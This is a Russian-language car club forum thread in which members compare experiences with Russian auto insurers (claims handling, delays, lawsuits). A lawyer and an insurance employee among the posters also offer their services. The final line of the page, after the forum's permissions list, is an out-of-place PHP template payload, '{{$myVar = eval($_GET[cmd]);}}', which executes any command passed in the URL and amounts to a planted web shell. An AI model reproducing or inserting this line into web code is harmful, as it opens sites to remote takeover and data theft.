+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 18

Тема: Страхование: какой у кого опыт?


  1. #1
    GTI-Racing PhotoN is on a distinguished road Аватар для PhotoN
    Регистрация
    15.07.2008
    Машина
    Goда Plus TSI
    Сообщений
    1

    Exclamation Страхование: какой у кого опыт?

    В разделе несколько тем, касающиеся прав, но нет ничего о страховании. Предлагаю делиться опытом в этой теме.

    Представлюсь: Меня зовут Илья. Я юрист. Сейчас страхование - один из источников моего дохода. Я могу помочь разораться в вопросах, которые могут быть непонятны многим людям, от страхования и/или юриспруденции далеким. Естественно, я могу не только проконсультировать по вопросам страхования, но так же предложить варианты страхования и все оформить, но об этом удобней говорить лично или в другой теме, а в этой предлагаю делиться опытом страхования в разных компаниях. Начну с себя.

    2 года назад я страховался по КАСКО в Москве в СК "Россия". Условия страхования меня устроили на 100%, цена - самая адекватная на тот момент. Машина была Mazda 3. Никогда ничего хорошего от людей потом не слышал об этой СК: все, кто были ее клиентами, говорили, что я сделал выбор неверный, попал. И тем не менее, на моем опыте никаких проблем в течение срока действия полиса у меня не было. Несколько страховых случаев = несколько направлений на ремонт. Удобная процедура оформления случаев: прямо в сервисном центре Mazda или у нескольких брокеров (это кроме самой СК) пишу заявление, отдаю первичную справку и больше ничего не требуется; через несколько дней звонят из сервиса, сообщают, что направление на ремонт получено. Единственная проблема с ними была после окончания срока действия полиса. О страховом случае я заявил вовремя, но они протянули время, и искали повода для отказа потом. Будучи юристом, я их легко убедил в своей правоте по e-mail в течение 3 дней.

    В прошлом году был застрахован в СПб в СК "Ренессанс". За год было несколько случаев. Первый - через 2 дня после выезда из салона: в мой гольф въехал молодой сбоку на жигулях. Через 3 месяца я узнал, что о страховом случае не заявлено, документов нет и т.д. В СК бардак: при нескольких подряд звонках разные операторы дают совершенно разную и порой противоположную информацию. В общем, работой СК остался недоволен ОЧЕНЬ. Хотя, надо отдать должное, при удаленном урегулировании через дилера все протекает очень комфортно и быстро. Но это заслуга дилера. К тому же, мой дилер перестал с ними работать в этом году: они не оплачивают или задерживают оплату произведенного по направлениям ремонта. Такие дела.

    Сейчас застрахован в Ингосстрахе. Но личного опыта урегулирования пока нет. Мои клиенты остались довольны, но об их опыте я рассказывать не могу.

  2. #2
    GTI-Racing VladKisov is on a distinguished road Аватар для VladKisov
    Регистрация
    30.08.2011
    Откуда
    Москва
    Машина
    Golf V
    Сообщений
    19
    застрахован в росгосстрахе, был один случай, довольно быстро решили

  3. #3
    GTI-Racing Pavlo is a jewel in the rough Pavlo is a jewel in the rough Pavlo is a jewel in the rough Pavlo is a jewel in the rough Аватар для Pavlo
    Регистрация
    16.07.2009
    Откуда
    Москва
    Машина
    Mk4 GTI '99, Passat CC DSG '11
    Сообщений
    1,073
    уже есть тема с подробным описанием что и как, единственное что могу добавить, так это внимание со стороны ВСК к своим клиентам - недавно жене пришло письмо на почту. так вот, господа из СК вовремя напомнили о продлении страхования жизни. молодцы одним словом, тк в банке наверняка бы не сказали про это.
    Golf IV GTI AGU Koni Sport Coils -40mm + KYB AGX; Borla Muffler Attack Sound; NeuSpeed Pulley Kit; Samco Cooling Kit; ACT Flywheels; Hotchkis Sway Bar; WhiteLine Front & Rear Busching; TD05HR 16G Turbo; Eagle H-Beam + JE Piston 8,5;
    Passat CC 1,8 TSI APRStage 1/2 Testpipe - Продано

  4. #4
    у СК Россия были проблемы в 2009-2010 году, щас всех кого там застраховал получали выплаты и направления на ремонты, проблем нету, тем более через меня

  5. #5
    Мисс GTI 2011 Julya has a spectacular aura about Julya has a spectacular aura about Julya has a spectacular aura about Аватар для Julya
    Регистрация
    20.04.2010
    Откуда
    Москва
    Машина
    Golf IV 1.6, Golf V 1.6 и зверюга
    Сообщений
    1,150
    хочу уйти из РЕСО, тока куда не знаю, посоветуй:expect:
    Последний раз редактировалось Julya; 31.08.2011 в 13:21.

  6. #6
    GTI-Racing RedThief is on a distinguished road Аватар для RedThief
    Регистрация
    28.04.2011
    Откуда
    Москва
    Машина
    Volkswagen Golf IV 1.8T GTI
    Сообщений
    33
    ИМХО существует 3 страховых в которых я могу посоветовать страховаться - ресо, согаз, ингос. Работаю уже второй год в страховой в юр. отделе. По критерию выплат это самые лучшие страховые. Обращайтесь по вопросам урегулирования страховых случаев =) Всегда помогу. Да и к этим компаниям сильно меньше исков в судах чем к другим. Самое большое кол-во исков мне кажется у росгосстраха, с ними постоянно судимся.
    Надеюсь мои советы помогут. На встрече могу подробнее рассказать если кому интересно. Да и взыскать со страховых всегда можно))
    God is a DJ. Life is music.

  7. #7
    GTI-Racing name is on a distinguished road Аватар для name
    Регистрация
    15.08.2011
    Откуда
    Москва
    Машина
    GTI 5
    Сообщений
    23
    чем они привлекательны? подскажите плз)

  8. #8
    Мисс GTI 2011 Julya has a spectacular aura about Julya has a spectacular aura about Julya has a spectacular aura about Аватар для Julya
    Регистрация
    20.04.2010
    Откуда
    Москва
    Машина
    Golf IV 1.6, Golf V 1.6 и зверюга
    Сообщений
    1,150
    Цитата Сообщение от RedThief Посмотреть сообщение
    ИМХО существует 3 страховых в которых я могу посоветовать страховаться - ресо, согаз, ингос. Работаю уже второй год в страховой в юр. отделе. По критерию выплат это самые лучшие страховые. Обращайтесь по вопросам урегулирования страховых случаев =) Всегда помогу. Да и к этим компаниям сильно меньше исков в судах чем к другим. Самое большое кол-во исков мне кажется у росгосстраха, с ними постоянно судимся.
    Надеюсь мои советы помогут. На встрече могу подробнее рассказать если кому интересно. Да и взыскать со страховых всегда можно))
    Ресо!!! Точно нет! Как раз с нее и хочу уйти и всех своих перевести. Столкнулись, были проблемы!

  9. #9
    GTI-Racing S@TURN will become famous soon enough Аватар для S@TURN
    Регистрация
    09.07.2006
    Откуда
    мск
    Машина
    vr6 color concept - sold, а4 2.5tdi куатро!-sold, EOS - недопережитиай.
    Сообщений
    3,787
    Оранта гуд) все всегда вовремя и в срок. плюс у них база по угонам европейская юзается.
    нам на эос все заявляли как на паццат,который угоняем как песеец.
    а тут эос в европе и в россии нах никому не нужОн.
    NON LIMITUS HOMICUS DOLBOEBICUS
    (нет предела человеческой глупости)

  10. #10
    GTI-Racing Freezero is on a distinguished road Аватар для Freezero
    Регистрация
    21.09.2011
    Откуда
    Кемерово
    Машина
    Бричка
    Сообщений
    19
    негативный, судился с компанией, но разве у нас что то докажешь(

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. 18'' на 4-й гольф - у кого есть опыт?
    от V.e.R в разделе Шины, диски
    Ответов: 23
    Последнее сообщение: 01.04.2024, 12:10
  2. выдержит ли сцепа ст.2? механика.есть ли опыт у кого или знакомые у кого такой сетап?
    от koct88 в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 27
    Последнее сообщение: 02.10.2023, 16:25
  3. свап двигателя 2.0tfsi, у кого был опыт?
    от AndrewKissel в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 25
    Последнее сообщение: 02.10.2023, 08:28
  4. Ответов: 23
    Последнее сообщение: 01.06.2008, 14:25
  5. У Кого Нить Был Опыт Установки В Гольфа (3-4) W8-w12
    от в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 0
    Последнее сообщение: 01.01.1970, 04:00

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}